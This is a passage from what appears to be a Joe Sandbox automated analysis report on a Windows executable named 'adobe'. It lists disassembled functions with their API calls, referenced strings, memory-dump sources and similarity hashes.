                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                          • String ID: (rI$.tmp
                                                                                                                                                          • API String ID: 1375471231-3138636223
                                                                                                                                                          • Opcode ID: c5dcbd4b090b64380de409b5e525eb1e0e06c0e183a767b6dafd3be885647caf
                                                                                                                                                          • Instruction ID: fdd405cf0ee7d7e8aaee19412d05bb9b19e2fd4e23256c5b47f735cbad2150ad
                                                                                                                                                          • Opcode Fuzzy Hash: c5dcbd4b090b64380de409b5e525eb1e0e06c0e183a767b6dafd3be885647caf
                                                                                                                                                          • Instruction Fuzzy Hash: C4211575A002089BDB01EFA5C8529DFB7B9EB48305F50457BE901B7382DA7C9F058BA9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00451B80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • 74D41520.VERSION(00000000,?,?,?,n_I), ref: 00451BA0
                                                                                                                                                          • 74D41500.VERSION(00000000,?,00000000,?,00000000,00451C1B,?,00000000,?,?,?,n_I), ref: 00451BCD
                                                                                                                                                          • 74D41540.VERSION(?,00451C44,?,?,00000000,?,00000000,?,00000000,00451C1B,?,00000000,?,?,?,n_I), ref: 00451BE7
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: D41500D41520D41540
                                                                                                                                                          • String ID: n_I
                                                                                                                                                          • API String ID: 2153611984-2401994647
                                                                                                                                                          • Opcode ID: e4d161465f036a103ebb289189d3cd0f170a5630909247fb2ee4af93fb68b9e6
                                                                                                                                                          • Instruction ID: 4f8324d0d9967553cfa4e2087f5e207790f68935e4380d12614fc4779ec75e8b
                                                                                                                                                          • Opcode Fuzzy Hash: e4d161465f036a103ebb289189d3cd0f170a5630909247fb2ee4af93fb68b9e6
                                                                                                                                                          • Instruction Fuzzy Hash: 5F219571A00248AFDB02DAA98C41EAFB7FCEB49301F55447AF800E3352D6799E04C769
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0044ABE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • 73A1A570.USER32(00000000,?,00000000,00000000,0044ACE1,?,{H,?,?), ref: 0044AC55
                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0044AC78
                                                                                                                                                          • 73A1A480.USER32(00000000,?,0044ACB8,00000000,0044ACB1,?,00000000,?,00000000,00000000,0044ACE1,?,{H,?,?), ref: 0044ACAB
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: A480A570ObjectSelect
                                                                                                                                                          • String ID: {H
                                                                                                                                                          • API String ID: 1230475511-1783425356
                                                                                                                                                          • Opcode ID: 3ef627e0227541c160f5483f4411feea27e9077cc7b2a08faaabc4aa9260d785
                                                                                                                                                          • Instruction ID: 3b5f26ead791ea6387a249f2cdaddc54e41ca9264cf2fbaff888b01415335cc3
                                                                                                                                                          • Opcode Fuzzy Hash: 3ef627e0227541c160f5483f4411feea27e9077cc7b2a08faaabc4aa9260d785
                                                                                                                                                          • Instruction Fuzzy Hash: CA21B670E44248AFEB01DFA5C885B9F7BB9EB48304F41807AF500E7281D77C9950CB6A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0044A914 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044A9A0,?,{H,?,?), ref: 0044A972
                                                                                                                                                          • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044A985
                                                                                                                                                          • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044A9B9
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DrawText$ByteCharMultiWide
                                                                                                                                                          • String ID: {H
                                                                                                                                                          • API String ID: 65125430-1783425356
                                                                                                                                                          • Opcode ID: 18b169e245813401a0f41c477646881a2abd9a6b0717883cb275958d94a96fcb
                                                                                                                                                          • Instruction ID: 8b0288b9d3461177b0e2011e4a6e3c0ecae8d00baf86e8e824f1a66b6306016d
                                                                                                                                                          • Opcode Fuzzy Hash: 18b169e245813401a0f41c477646881a2abd9a6b0717883cb275958d94a96fcb
                                                                                                                                                          • Instruction Fuzzy Hash: 0E11B6B27446047FEB10DAAA9C82E6FB7ECEB49724F10417BF504E7290D6389E018669
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00451E58 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60processCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,00000000,?,?,puE,00000000,XuE,?,?,?,00000000,00451ED2,?,?,?,00000001), ref: 00451EAC
                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,?,?,puE,00000000,XuE,?,?,?,00000000,00451ED2,?,?,?,00000001), ref: 00451EB4
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateErrorLastProcess
                                                                                                                                                          • String ID: XuE$puE
                                                                                                                                                          • API String ID: 2919029540-1777687408
                                                                                                                                                          • Opcode ID: 0669253b94e97d79e5e553ecbd5c422723894a7d9947c46f5925aa1b9a2f36a5
                                                                                                                                                          • Instruction ID: 005b97d9f3d6fc2d61eebea25250fab46ca672ee3877172d18c79183b21e8564
                                                                                                                                                          • Opcode Fuzzy Hash: 0669253b94e97d79e5e553ecbd5c422723894a7d9947c46f5925aa1b9a2f36a5
                                                                                                                                                          • Instruction Fuzzy Hash: 1B113C76600208AF8B50DEADDC41EEB77ECEB4D310B51456ABD18E3251D634AD148B64
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042EBAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39
                                                                                                                                                            • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                                                                                            • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                                                                                            • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                                                                                          • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                          • API String ID: 395431579-1506664499
                                                                                                                                                          • Opcode ID: b6299dd789516675415794c1050a72ed988892d12d41c5adc8c3ba5c36fbba6e
                                                                                                                                                          • Instruction ID: 0a6e4b60a995cf3844b8ce041fcdcfda7059b8caa19e1ea1d7c6064077637db5
                                                                                                                                                          • Opcode Fuzzy Hash: b6299dd789516675415794c1050a72ed988892d12d41c5adc8c3ba5c36fbba6e
                                                                                                                                                          • Instruction Fuzzy Hash: DF115130B00618ABDB11EBA3EC46B9E7BACDB55704F904477F440A6291DB7C9E05865D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00454F3C Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
                                                                                                                                                          • RegCloseKey.ADVAPI32(?,00454FA7,?,00000001,00000000), ref: 00454F9A
                                                                                                                                                          Strings
                                                                                                                                                          • PendingFileRenameOperations, xrefs: 00454F6C
                                                                                                                                                          • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454F48
                                                                                                                                                          • PendingFileRenameOperations2, xrefs: 00454F7B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseOpen
                                                                                                                                                          • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                                                                                          • API String ID: 47109696-2115312317
                                                                                                                                                          • Opcode ID: 1d1014fa8df93e57a927e8a353b20bc7fc4ba26612649d36a04e0652a89df34a
                                                                                                                                                          • Instruction ID: 4e36f23c0afdd0c8c7c5a5796e308a2b8506757bff9ef38b92e62c150fb0ca3e
                                                                                                                                                          • Opcode Fuzzy Hash: 1d1014fa8df93e57a927e8a353b20bc7fc4ba26612649d36a04e0652a89df34a
                                                                                                                                                          • Instruction Fuzzy Hash: 67F062322142446FD70596AAEC13E1B73EEE7C471DFA04466F800DB582DA79AD94962C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00471278 Relevance: 6.3, APIs: 4, Instructions: 263fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,00471449,?,00000000,?,0049B178,00000000,00471617,?,00000000,?,00000000,?,004717E5), ref: 00471425
                                                                                                                                                          • FindClose.KERNEL32(000000FF,00471450,00471449,?,00000000,?,0049B178,00000000,00471617,?,00000000,?,00000000,?,004717E5,?), ref: 00471443
                                                                                                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0047156B,?,00000000,?,0049B178,00000000,00471617,?,00000000,?,00000000,?,004717E5), ref: 00471547
                                                                                                                                                          • FindClose.KERNEL32(000000FF,00471572,0047156B,?,00000000,?,0049B178,00000000,00471617,?,00000000,?,00000000,?,004717E5,?), ref: 00471565
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$CloseFileNext
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2066263336-0
                                                                                                                                                          • Opcode ID: d6d041cb8f7c491ce77016926a25bb81e4023aa25833d9b76f2ffef6629c5ed7
                                                                                                                                                          • Instruction ID: 0f4871d982279d9997c19f03ad0fbebdd4117ece3c196d883e63fe27161a8bf3
                                                                                                                                                          • Opcode Fuzzy Hash: d6d041cb8f7c491ce77016926a25bb81e4023aa25833d9b76f2ffef6629c5ed7
                                                                                                                                                          • Instruction Fuzzy Hash: 1FB12F3490425D9FCF11DFA9C881ADEBBB9FF49304F5081A6E848B7261D7389A45CF54
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0047E534 Relevance: 6.1, APIs: 4, Instructions: 147fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047E72D,?,00000000,00000000,?,?,0047F94A,?,?,00000000), ref: 0047E5DA
                                                                                                                                                          • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047E72D,?,00000000,00000000,?,?,0047F94A,?,?), ref: 0047E5E7
                                                                                                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0047E700,?,?,?,?,00000000,0047E72D,?,00000000,00000000,?,?,0047F94A), ref: 0047E6DC
                                                                                                                                                          • FindClose.KERNEL32(000000FF,0047E707,0047E700,?,?,?,?,00000000,0047E72D,?,00000000,00000000,?,?,0047F94A,?), ref: 0047E6FA
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$CloseFileNext
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2066263336-0
                                                                                                                                                          • Opcode ID: 303a35a3064e31ac026ab8e7c7805e0374f6944332f92ee79bd9a44763869d60
                                                                                                                                                          • Instruction ID: 28583fff67185971eef34c5c69b0e551aac517942e8b674ad10e64284e68e1a2
                                                                                                                                                          • Opcode Fuzzy Hash: 303a35a3064e31ac026ab8e7c7805e0374f6944332f92ee79bd9a44763869d60
                                                                                                                                                          • Instruction Fuzzy Hash: D4515F70900648AFCB10EFA6CC45ADEB7B8EB48319F5085EAE408E7351D6389F45CF54
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00421284 Relevance: 6.1, APIs: 4, Instructions: 127windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetMenu.USER32(00000000), ref: 00421371
                                                                                                                                                          • SetMenu.USER32(00000000,00000000), ref: 0042138E
                                                                                                                                                          • SetMenu.USER32(00000000,00000000), ref: 004213C3
                                                                                                                                                          • SetMenu.USER32(00000000,00000000), ref: 004213DF
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Menu
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3711407533-0
                                                                                                                                                          • Opcode ID: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
                                                                                                                                                          • Instruction ID: d5697da4fc95676b4ee4b3549606d87e5ebc590dd77dbca5d1b8da67126da037
                                                                                                                                                          • Opcode Fuzzy Hash: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
                                                                                                                                                          • Instruction Fuzzy Hash: D041A13070025447EB20EA79A88579B26965F69318F4805BFFC44DF3A3CA7DCC45839D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00416B52 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageA.USER32(?,?,?,?), ref: 00416B94
                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00416BAE
                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00416BC8
                                                                                                                                                          • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Color$CallMessageProcSendTextWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 601730667-0
                                                                                                                                                          • Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                                                                                                          • Instruction ID: 7a78515b3e46194db8101330e18da160614de8b80347fcfd5663145ee8fb6c7e
                                                                                                                                                          • Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                                                                                                          • Instruction Fuzzy Hash: 27115EB6600A04AFC710EE6ECC84E8773ECDF48314715883EB59ADB612D638F8418B69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004544A8 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WaitForInputIdle.USER32(00000001,00000032), ref: 004544D4
                                                                                                                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 004544F6
                                                                                                                                                          • GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454505
                                                                                                                                                          • CloseHandle.KERNEL32(00000001,00454532,0045452B,?,00000031,00000080,00000000,?,?,0045488B,00000080,0000003C,00000000,004548A1), ref: 00454525
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4071923889-0
                                                                                                                                                          • Opcode ID: c260732f7bc6e66c93fc0747e95a28efc76e926114616c5ed118186cab325e54
                                                                                                                                                          • Instruction ID: 349487cf624deee767c852797b2fe0003e47ef85cfa7f40603711d6a768e5e19
                                                                                                                                                          • Opcode Fuzzy Hash: c260732f7bc6e66c93fc0747e95a28efc76e926114616c5ed118186cab325e54
                                                                                                                                                          • Instruction Fuzzy Hash: 15012D706406087FEB209B968C06F6B7BACDF49774F510167FA04DB2C2D5788E40CA69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004230D8 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • 73A1A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                                                                                                          • EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                                                                                          • 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                                                                                                          • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: A24620A480A570EnumFonts
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2630238358-0
                                                                                                                                                          • Opcode ID: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                                                                                                          • Instruction ID: 16e9332b6476af0d686f12fa818e5571f82757a24bc5219822a197079b30e1ec
                                                                                                                                                          • Opcode Fuzzy Hash: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                                                                                                          • Instruction Fuzzy Hash: D80192717447106AE710BF7A5C86B9B36649F04719F40427BF804AF2C7D6BE9C05476E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0045BA84 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0044FF9C: SetEndOfFile.KERNEL32(?,?,0045BB62,00000000,0045BCED,?,00000000,00000002,00000002), ref: 0044FFA3
                                                                                                                                                          • FlushFileBuffers.KERNEL32(?), ref: 0045BCB9
                                                                                                                                                          Strings
                                                                                                                                                          • NumRecs range exceeded, xrefs: 0045BBB6
                                                                                                                                                          • EndOffset range exceeded, xrefs: 0045BBED
